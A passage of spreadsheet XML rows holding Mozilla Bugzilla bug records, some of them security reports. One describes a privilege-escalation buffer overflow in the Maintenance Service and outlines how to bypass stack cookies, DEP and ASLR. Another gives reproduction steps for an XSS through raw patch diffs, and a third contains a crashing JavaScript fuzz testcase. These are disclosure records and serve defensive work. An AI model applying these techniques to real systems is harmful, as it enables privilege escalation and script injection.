      <c r="Q5740" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5740" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5740" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T5740" t="n">
        <v>1</v>
      </c>
      <c r="U5740" t="n">
        <v>0</v>
      </c>
      <c r="V5740" t="n">
        <v>17</v>
      </c>
      <c r="W5740" t="inlineStr">
        <is>
          <t>Created attachment 721765
Proof of Concept source code and executable
The Mozilla Maintenance Service is vulnerable to a stack-based buffer overflow, allowing an unprivileged user to escalate privileges to NT_AUTHORITY\SYSTEM.
The bug lies in workmonitor.cpp, in the ProcessSoftwareUpdateCommand function, at lines 307-308, where a fixed size array is passed to GetInstallationDir:
WCHAR installDir[MAX_PATH] = {L'\0'};
if (!GetInstallationDir(argc, argv, installDir)) {
GetInstallationDir, in turn, performs an unchecked copy of argv[2] into the destination buffer (here, installDir):
static BOOL
GetInstallationDir(int argcTmp, LPWSTR *argvTmp, WCHAR aResultDir[MAX_PATH])
{
  if (argcTmp &lt; 2) {
    return FALSE;
  }
  wcscpy(aResultDir, argvTmp[2]);
Maintenanceservice.exe wrongly assumes that its arguments have a valid size. However, due to the way the maintenance service is configured, any unprivileged user can start it, with arbitrary arguments: this is why Firefox can use it to upgrade without triggering an UAC prompt.
In the ProcessSoftwareUpdateCommand stack layout, the installDir buffer is located 588 bytes before the security cookie used to protect against stack based buffer overflows. Therefore, an argv[2] greater than 588 bytes will trigger a process termination due to this protection, and an event will be added to the Windows' event log. The attached PoC triggers the bug with a 592 bytes long argv[2].
The event can later be viewed with Windows' event viewer, under the Windows logs &gt; Application category:
Problem signature:
P1: maintenanceservice.exe =&gt; exe filename
P2: 19.0.0.4794            =&gt; exe version
P3: 511eba22               =&gt; exe timestamp
[...]
P7: 0000313b               =&gt; faulting offset from ImageBase, this is the instruction right after __security_check_cookie in ProcessSoftwareUpdateCommand
P8: c0000409               =&gt; Exception type: Stack buffer overflow
Although it may look like the bug is not exploitable due to the stack overflow protection, it is indeed possible to exploit this bug:
-The service can be launched as many times as needed: the attacker gets as many tries as needed.
-The security cookie (stack overflow protection) is predictable (see below).
-ASLR and DEP are useless (see below).
Stack overflow protection:
The stack overflow protection works by generating a 32 bits integer which is called the security cookie. It is supposed to be random, however it is not. It is obtained by XORing the result of GetSystemTimeAsFileTime, GetTickCount, QueryPerformanceCounter, the process ID, and the thread ID:
-An attacker can call the 3 functions just before launching the service, and the results will be nearly identical, as they are all time-based. Even if there is a difference, it'll affect only the lowest bits of the security cookie.
-The process ID is predictable, as is the thread ID. Furthermore, they are low values, never superior to 1,000,000, and as such will affect only the lowest bits of the security cookie.
This makes the real entropy of the security cookie 16 bits, low enough to make an attack practical.
ASLR and DEP:
DEP is defeated with a ROP payload.
ASLR is useless because the base addresses of some DLLs like ntdll and kernel32 are randomized at boot time, and don't change until next reboot. An attacker running can just call GetModuleHandle to get their base addresses, and adapt the payload.
This was tested on Windows 7 64 bits, and it should work on all versions of Windows.</t>
        </is>
      </c>
      <c r="X5740" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5741">
      <c r="A5741" t="n">
        <v>637981</v>
      </c>
      <c r="B5741" t="inlineStr">
        <is>
          <t>2011-03-01 19:18:02 -0800</t>
        </is>
      </c>
      <c r="C5741" t="inlineStr">
        <is>
          <t>[SECURITY] "Raw Unified" patch diffs can cause XSS on this domain in IE 6-8 and Safari</t>
        </is>
      </c>
      <c r="D5741" t="inlineStr">
        <is>
          <t>2024-05-29 15:48:54 -0700</t>
        </is>
      </c>
      <c r="E5741" t="n">
        <v>1</v>
      </c>
      <c r="F5741" t="n">
        <v>1</v>
      </c>
      <c r="G5741" t="n">
        <v>4</v>
      </c>
      <c r="H5741" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5741" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5741" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K5741" t="inlineStr">
        <is>
          <t>2.10</t>
        </is>
      </c>
      <c r="L5741" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5741" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5741" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5741" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5741" t="inlineStr"/>
      <c r="Q5741" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5741" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5741" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T5741" t="n">
        <v>1</v>
      </c>
      <c r="U5741" t="n">
        <v>0</v>
      </c>
      <c r="V5741" t="n">
        <v>49</v>
      </c>
      <c r="W5741" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Build Identifier: 
A valid patch file, uploaded as an attachment to a Bugzilla installation (and marked as a patch), can be served up raw from the Bugzilla installation's main domain with Content-type text/plain. In IE 6 through 8, that Content-type triggers HTML sniffing behavior: as such, a malicious patch containing HTML will be parsed when viewed in those browsers, allowing for the execution of JavaScript in the context of the Bugzilla installation.
Reproducible: Always
Steps to Reproduce:
1. Create a patch file containing HTML
2. Upload it as an attachment to an existing bug, making sure to mark it as a patch
3. Under Attachments, find your malicious patch and click on "Diff" (it's right next to "Details")
4. Up toward the top of the page, click on "Raw Unified". Notice the address bar does not switch domains, as it normally does when serving up user content.
5. If you're in IE, you should see the attachment being parsed as HTML.</t>
        </is>
      </c>
      <c r="X5741" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5742">
      <c r="A5742" t="n">
        <v>1014508</v>
      </c>
      <c r="B5742" t="inlineStr">
        <is>
          <t>2014-05-22 04:39:46 -0700</t>
        </is>
      </c>
      <c r="C5742" t="inlineStr">
        <is>
          <t>[tarako] Offline detection is broken - Marketplace is always considering we are online</t>
        </is>
      </c>
      <c r="D5742" t="inlineStr">
        <is>
          <t>2014-05-23 04:46:23 -0700</t>
        </is>
      </c>
      <c r="E5742" t="n">
        <v>1</v>
      </c>
      <c r="F5742" t="n">
        <v>1</v>
      </c>
      <c r="G5742" t="n">
        <v>6</v>
      </c>
      <c r="H5742" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5742" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J5742" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5742" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L5742" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5742" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N5742" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5742" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5742" t="inlineStr"/>
      <c r="Q5742" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5742" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5742" t="inlineStr">
        <is>
          <t>2014-05-27</t>
        </is>
      </c>
      <c r="T5742" t="n">
        <v>1</v>
      </c>
      <c r="U5742" t="n">
        <v>0</v>
      </c>
      <c r="V5742" t="n">
        <v>7</v>
      </c>
      <c r="W5742" t="inlineStr">
        <is>
          <t>tarako build identifier:20140331101634
connectivity used:Offline
noticed on: latest dev
app used for test: - 
steps to reproduce:
1.Be sure that your tarako device is offline
2.Start the MP app
expected behavior:
User is asked to go online in order to start the app
observed behavior:
App is opened, no warning displayed
reproducible?: yes
ashes:
behavior seen on regular marketplace using inari/hamachi: yes/no</t>
        </is>
      </c>
      <c r="X5742" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5743">
      <c r="A5743" t="n">
        <v>467881</v>
      </c>
      <c r="B5743" t="inlineStr">
        <is>
          <t>2008-12-03 22:51:01 -0800</t>
        </is>
      </c>
      <c r="C5743" t="inlineStr">
        <is>
          <t>Crash [@ IsBindingAncestor] with frameset, iframe, {ib}</t>
        </is>
      </c>
      <c r="D5743" t="inlineStr">
        <is>
          <t>2018-08-29 15:22:03 -0700</t>
        </is>
      </c>
      <c r="E5743" t="n">
        <v>1</v>
      </c>
      <c r="F5743" t="n">
        <v>1</v>
      </c>
      <c r="G5743" t="n">
        <v>3</v>
      </c>
      <c r="H5743" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5743" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5743" t="inlineStr">
        <is>
          <t>Layout: Images, Video, and HTML Frames</t>
        </is>
      </c>
      <c r="K5743" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5743" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5743" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5743" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5743" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5743" t="inlineStr">
        <is>
          <t>[sg:critical?] common fuzz blocker - post 1.8 branch</t>
        </is>
      </c>
      <c r="Q5743" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5743" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5743" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T5743" t="n">
        <v>1</v>
      </c>
      <c r="U5743" t="n">
        <v>0</v>
      </c>
      <c r="V5743" t="n">
        <v>25</v>
      </c>
      <c r="W5743" t="inlineStr">
        <is>
          <t>Created attachment 351325
testcase (crashes Firefox when loaded)
###!!! ASSERTION: reflow roots should never split: 'status == NS_FRAME_COMPLETE', file /Users/jruderman/central/layout/base/nsPresShell.cpp, line 6347
###!!! ASSERTION: frame not in line: 'line-&gt;Contains(aDeletedFrame)', file /Users/jruderman/central/layout/generic/nsBlockFrame.cpp, line 5385
Crash [@ IsBindingAncestor] trying to access memory at 0xdddddded.</t>
        </is>
      </c>
      <c r="X5743" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5744">
      <c r="A5744" t="n">
        <v>1296078</v>
      </c>
      <c r="B5744" t="inlineStr">
        <is>
          <t>2016-08-17 13:27:48 -0700</t>
        </is>
      </c>
      <c r="C5744" t="inlineStr">
        <is>
          <t>format string mismatch in CreateDXVAManagerEvent::Run()</t>
        </is>
      </c>
      <c r="D5744" t="inlineStr">
        <is>
          <t>2017-08-28 13:30:23 -0700</t>
        </is>
      </c>
      <c r="E5744" t="n">
        <v>1</v>
      </c>
      <c r="F5744" t="n">
        <v>1</v>
      </c>
      <c r="G5744" t="n">
        <v>3</v>
      </c>
      <c r="H5744" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5744" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5744" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5744" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5744" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5744" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N5744" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5744" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5744" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main49-]</t>
        </is>
      </c>
      <c r="Q5744" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5744" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5744" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T5744" t="n">
        <v>1</v>
      </c>
      <c r="U5744" t="n">
        <v>0</v>
      </c>
      <c r="V5744" t="n">
        <v>11</v>
      </c>
      <c r="W5744" t="inlineStr">
        <is>
          <t>CreateDXVAManagerEvent::Run has two instances of code that looks like:
    const nsACString&amp; blacklistedDLL = FindD3D9BlacklistedDLL();
    if (!blacklistedDLL.IsEmpty()) {
      mFailureReason.AppendPrintf("D3D9 blacklisted with DLL %s",
                                  blacklistedDLL);
    } else {
      ...
    }
Notice that we're passing the nsACString&amp; to the printf call, rather than the char* contained therein.  clang-cl complains about this, with dire warnings about bad things happening at runtime.  I don't know what MSVC does with this code, but it's clearly wrong.
Filing as a security bug because format string mismatches can be bad, but I'm not sure how bad this one is.</t>
        </is>
      </c>
      <c r="X5744" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5745">
      <c r="A5745" t="n">
        <v>1439728</v>
      </c>
      <c r="B5745" t="inlineStr">
        <is>
          <t>2018-02-20 13:00:07 -0800</t>
        </is>
      </c>
      <c r="C5745" t="inlineStr">
        <is>
          <t>AwesomeBar forcing switch to existing tab for the heuristic entry</t>
        </is>
      </c>
      <c r="D5745" t="inlineStr">
        <is>
          <t>2018-03-16 01:16:49 -0700</t>
        </is>
      </c>
      <c r="E5745" t="n">
        <v>1</v>
      </c>
      <c r="F5745" t="n">
        <v>1</v>
      </c>
      <c r="G5745" t="n">
        <v>2</v>
      </c>
      <c r="H5745" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5745" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5745" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K5745" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5745" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5745" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5745" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5745" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5745" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q5745" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5745" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5745" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T5745" t="n">
        <v>1</v>
      </c>
      <c r="U5745" t="n">
        <v>0</v>
      </c>
      <c r="V5745" t="n">
        <v>34</v>
      </c>
      <c r="W5745" t="inlineStr">
        <is>
          <t>I started noticing this yesterday but I am not sure which Nightly build I was running at the time.
STR:
1. Open a tab, point it to reddit.com/r/firefox
2. Open a second tab, type reddit.com/r/firefox
Expected:
The top entry in the AwesomeBar is "Visit," and when I press enter the tab loads a new instance of reddit.com/r/firefox
Actual:
There is no "Visit" entry. The top entry is the existing /r/firefox tab, and thus pressing enter sends me to the previous tab. It is not possible to direct a new tab to a new instance of a website that is already open in another tab.</t>
        </is>
      </c>
      <c r="X5745" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5746">
      <c r="A5746" t="n">
        <v>808845</v>
      </c>
      <c r="B5746" t="inlineStr">
        <is>
          <t>2012-11-05 16:29:43 -0800</t>
        </is>
      </c>
      <c r="C5746" t="inlineStr">
        <is>
          <t>[SECURITY] Security vulnerability in YUI's swfstore.swf in YUI 2.8.2 and 2.9.0</t>
        </is>
      </c>
      <c r="D5746" t="inlineStr">
        <is>
          <t>2012-11-14 04:30:16 -0800</t>
        </is>
      </c>
      <c r="E5746" t="n">
        <v>1</v>
      </c>
      <c r="F5746" t="n">
        <v>1</v>
      </c>
      <c r="G5746" t="n">
        <v>4</v>
      </c>
      <c r="H5746" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5746" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5746" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5746" t="inlineStr">
        <is>
          <t>3.7.1</t>
        </is>
      </c>
      <c r="L5746" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5746" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5746" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5746" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5746" t="inlineStr"/>
      <c r="Q5746" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5746" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5746" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T5746" t="n">
        <v>1</v>
      </c>
      <c r="U5746" t="n">
        <v>0</v>
      </c>
      <c r="V5746" t="n">
        <v>11</v>
      </c>
      <c r="W5746" t="inlineStr">
        <is>
          <t>Created attachment 678540
Patched swfstore.swf for YUI 2.8.2 (Bugzilla 4.0)
Bugzilla 3.6 has no SWF files in js/yui/ and so is not affected by the vulnerability described here. Bugzilla 4.0 and newer all have:
  md5sum ./swfstore/swfstore.swf 8526b66bd23fe8cebfa3426ad9c74ff0
This is the md5sum of swfstore.swf being released with YUI 2.8.0 - 2.8.2 (bug 606618).
Per http://yuilibrary.com/support/20121030-vulnerability/, this SWF file is affected. Bugzilla 4.2 and newer were supposed to be fully upgraded to YUI 2.9.0 (bug 649879) which is not affected by this issue, and which has the following checksum:
  md5sum ./swfstore/swfstore.swf 844a3718c5f8c04ece6a86065a658a07
But this file has not been included in the list of updated files in bug 649879, and so we are still storing the file from YUI 2.8.x instead of the new one from YUI 2.9.0. Consequently, we are vulnerable to CVE-2012-5475. :(
Attached is the patched swfstore.swf file for YUI 2.8.2 (Bugzilla 4.0):
  md5sum swfstore.swf 0114ab8c878ac4e48fd110f32164258b</t>
        </is>
      </c>
      <c r="X5746" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5747">
      <c r="A5747" t="n">
        <v>1205937</v>
      </c>
      <c r="B5747" t="inlineStr">
        <is>
          <t>2015-09-17 19:54:40 -0700</t>
        </is>
      </c>
      <c r="C5747" t="inlineStr">
        <is>
          <t>Crash [@ js::gc::IsInsideNursery(js::gc::Cell const*)]</t>
        </is>
      </c>
      <c r="D5747" t="inlineStr">
        <is>
          <t>2016-09-26 09:26:30 -0700</t>
        </is>
      </c>
      <c r="E5747" t="n">
        <v>1</v>
      </c>
      <c r="F5747" t="n">
        <v>1</v>
      </c>
      <c r="G5747" t="n">
        <v>3</v>
      </c>
      <c r="H5747" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5747" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5747" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5747" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5747" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5747" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5747" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5747" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5747" t="inlineStr">
        <is>
          <t>[jsbugmon:][post-critsmash-triage][adv-main42+]</t>
        </is>
      </c>
      <c r="Q5747" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5747" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5747" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T5747" t="n">
        <v>1</v>
      </c>
      <c r="U5747" t="n">
        <v>0</v>
      </c>
      <c r="V5747" t="n">
        <v>22</v>
      </c>
      <c r="W5747" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision e7d613b3bcfe (build with --enable-gczeal --enable-optimize="-O2 -g" --enable-address-sanitizer --enable-posix-nspr-emulation --disable-jemalloc --disable-tests --disable-debug, run with --fuzzing-safe --thread-count=2 --ion-extra-checks --ion-eager):
gczeal(7,1);
eval(`
var otherGlobalSameCompartment = newGlobal("same-compartment");
eval = otherGlobalSameCompartment.eval;
`);
loadFile(`
/**
Yes, I'm a multi-line comment spanning 18 lines.
Don't you dare to make me smaller or larger...
*/
new TestCase( 
              SECTION,
              "MakeDate(Number.POSITIVE_INFINITY, 0)",
              Number.NaN,
              MakeDate(Number.POSITIVE_INFINITY, 0)
);
new TestCase( 
              SECTION,
              "MakeDate(Number.NEGATIVE_INFINITY, 0)",
              Number.NaN,
              NaN[MakeDate+4]
);
new TestCase( 
              SECTION,
              "MakeDate(0, Number.POSITIVE_INFINITY)",
              Number.target ,
              MakeDate(0, Number.POSITIVE_INFINITY)
);
new TestCase( 
	      SECTION,
              "MakeDate(0, Number.NEGATIVE_INFINITY)",
              Number.NaN,
              MakeDate(0, ( (yield    )  , SECTION   ? (yield    )  : (yield    )        , (yield    )       ) .NEGATIVE_INFINITY)
);
test();
`);
function loadFile(lfVarx) {
  eval("(function() { " + lfVarx + " })();"); 
}
Backtrace:
==65394==ERROR: AddressSanitizer: SEGV on unknown address 0x7fff000fffe8 (pc 0x000000dbe2f9 sp 0x7fffb39d1540 bp 0x7fffb39d1630 T0)
    #0 0xdbe2f8 in js::gc::IsInsideNursery(js::gc::Cell const*) js/src/opt64asan/js/src/../../dist/include/js/HeapAPI.h:312
    #1 0xdbe2f8 in void js::TenuringTracer::traverse&lt;JSObject*&gt;(JSObject**) js/src/gc/Marking.cpp:1888
    #2 0xdbe2f8 in void js::TenuringTracer::traverse&lt;JS::Value&gt;(JS::Value*) js/src/gc/Marking.cpp:1900
    #3 0xdbe2f8 in void DispatchToTracer&lt;JS::Value&gt;(JSTracer*, JS::Value*, char const*) js/src/gc/Marking.cpp:602
    #4 0xea31e5 in js::jit::BaselineFrame::trace(JSTracer*, js::jit::JitFrameIterator&amp;) js/src/jit/BaselineFrame.cpp:53
    #5 0x11d0996 in js::jit::MarkJitActivation(JSTracer*, js::jit::JitActivationIterator const&amp;) js/src/jit/JitFrames.cpp:1546
    #6 0x11d0996 in js::jit::MarkJitActivations(JSRuntime*, JSTracer*) js/src/jit/JitFrames.cpp:1581
    #7 0xd4d9e5 in js::gc::GCRuntime::markRuntime(JSTracer*, js::gc::GCRuntime::TraceOrMarkRuntime) js/src/gc/RootMarking.cpp:332
    #8 0xd48366 in js::Nursery::collect(JSRuntime*, JS::gcreason::Reason, js::Vector&lt;js::ObjectGroup*, 0ul, js::SystemAllocPolicy&gt;*) js/src/gc/Nursery.cpp:460
    #9 0x175214d in js::gc::GCRuntime::minorGCImpl(JS::gcreason::Reason, js::Vector&lt;js::ObjectGroup*, 0ul, js::SystemAllocPolicy&gt;*) js/src/jsgc.cpp:6502
    #10 0x175214d in js::gc::GCRuntime::minorGC(JS::gcreason::Reason) js/src/gc/GCRuntime.h:606
    #11 0x16aca64 in js::gc::GCRuntime::runDebugGC() js/src/jsgc.cpp:6725
    #12 0x8e692f in js::gc::GCRuntime::gcIfNeededPerAllocation(JSContext*) js/src/gc/Allocator.cpp:28
    #13 0x90e9b6 in JSContext::runtime() const js/src/gc/Allocator.cpp:55
    #14 0x90e9b6 in js::BaseShape* js::Allocate&lt;js::BaseShape, (js::AllowGC)1&gt;(js::ExclusiveContext*) js/src/gc/Allocator.cpp:211
    #15 0xb6e66a in js::BaseShape::getUnowned(js::ExclusiveContext*, js::StackBaseShape&amp;) js/src/vm/Shape.cpp:1262
    #16 0xb724bb in js::EmptyShape::getInitialShape(js::ExclusiveContext*, js::Class const*, js::TaggedProto, unsigned long, unsigned int) js/src/vm/Shape.cpp:1502
    #17 0x16d22e5 in NewObject(js::ExclusiveContext*, JS::Handle&lt;js::ObjectGroup*&gt;, js::gc::AllocKind, js::NewObjectKind, unsigned int) js/src/jsobj.cpp:678
    #18 0x16d1ad4 in js::NewObjectWithGivenTaggedProto(js::ExclusiveContext*, js::Class const*, JS::Handle&lt;js::TaggedProto&gt;, js::gc::AllocKind, js::NewObjectKind, unsigned int) js/src/jsobj.cpp:745:29
    #19 0x9a846d in js::NewObjectWithGivenTaggedProto(js::ExclusiveContext*, js::Class const*, JS::Handle&lt;js::TaggedProto&gt;, js::NewObjectKind, unsigned int) js/src/jsobjinlines.h:641
    #20 0x9a846d in js::NewObjectWithGivenProto(js::ExclusiveContext*, js::Class const*, JS::Handle&lt;JSObject*&gt;, js::NewObjectKind) js/src/jsobjinlines.h:676
    #21 0x9a846d in js::NewNativeObjectWithGivenProto(js::ExclusiveContext*, js::Class const*, JS::Handle&lt;JSObject*&gt;, js::NewObjectKind) js/src/vm/NativeObject-inl.h:337
    #22 0x9a846d in CreateBlankProto(JSContext*, js::Class const*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;) js/src/vm/GlobalObject.cpp:472
    #23 0x93a286 in js::GlobalObject::createBlankPrototype(JSContext*, js::Class const*) js/src/vm/GlobalObject.cpp:488
    #24 0x16c0170 in js::GlobalObject::initIteratorClasses(JSContext*, JS::Handle&lt;js::GlobalObject*&gt;) js/src/jsiter.cpp:1383
    #25 0x16c16ba in js::InitIteratorClasses(JSContext*, JS::Handle&lt;JSObject*&gt;) js/src/jsiter.cpp:1453
    #26 0x9a4dd2 in js::GlobalObject::resolveConstructor(JSContext*, JS::Handle&lt;js::GlobalObject*&gt;, JSProtoKey) js/src/vm/GlobalObject.cpp:133
    #27 0x99e890 in js::GlobalObject::ensureConstructor(JSContext*, JS::Handle&lt;js::GlobalObject*&gt;, JSProtoKey) js/src/vm/GlobalObject.cpp:100
    #28 0x99e890 in js::GlobalObject::getOrCreateLegacyGeneratorObjectPrototype(JSContext*, JS::Handle&lt;js::GlobalObject*&gt;) js/src/vm/GlobalObject.h:555
    #29 0x99e890 in js::GeneratorObject::create(JSContext*, js::AbstractFramePtr) js/src/vm/GeneratorObject.cpp:41
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV js/src/opt64asan/js/src/../../dist/include/js/HeapAPI.h:312 js::gc::IsInsideNursery(js::gc::Cell const*)
==65394==ABORTING
Honestly I have no clue what's going on here. This test crashes only in 64 bit ASan builds, not in any other build type I tried. It also only crashes when the exact number of line breaks is preserved in that second template string.</t>
        </is>
      </c>
      <c r="X5747" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5748">
      <c r="A5748" t="n">
        <v>631626</v>
      </c>
      <c r="B5748" t="inlineStr">
        <is>
          <t>2011-02-04 12:24:31 -0800</t>
        </is>
      </c>
      <c r="C5748" t="inlineStr">
        <is>
          <t>[Fx4Launch] add screenshots to mozilla.com</t>
        </is>
      </c>
      <c r="D5748" t="inlineStr">
        <is>
          <t>2013-11-13 02:20:31 -0800</t>
        </is>
      </c>
      <c r="E5748" t="n">
        <v>1</v>
      </c>
      <c r="F5748" t="n">
        <v>1</v>
      </c>
      <c r="G5748" t="n">
        <v>5</v>
      </c>
      <c r="H5748" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5748" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J5748" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5748" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5748" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5748" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5748" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5748" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5748" t="inlineStr"/>
      <c r="Q5748" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5748" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5748" t="inlineStr">
        <is>
          <t>1.4</t>
        </is>
      </c>
      <c r="T5748" t="n">
        <v>1</v>
      </c>
      <c r="U5748" t="n">
        <v>0</v>
      </c>
      <c r="V5748" t="n">
        <v>17</v>
      </c>
      <c r="W5748" t="inlineStr">
        <is>
          <t>This is a placeholder bug for now to remind us that we'll need to update all the screenshots on mozilla.com after RC1 comes out. When that happens, we'll file spinoff bugs as necessary to cover all the pages needed.
Stay tuned!</t>
        </is>
      </c>
      <c r="X5748" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5749">
      <c r="A5749" t="n">
        <v>688364</v>
      </c>
      <c r="B5749" t="inlineStr">
        <is>
          <t>2011-09-21 21:18:29 -0700</t>
        </is>
      </c>
      <c r="C5749" t="inlineStr">
        <is>
          <t>compartment mismatch when sharing with F1</t>
        </is>
      </c>
      <c r="D5749" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5749" t="n">
        <v>1</v>
      </c>
      <c r="F5749" t="n">
        <v>1</v>
      </c>
      <c r="G5749" t="n">
        <v>3</v>
      </c>
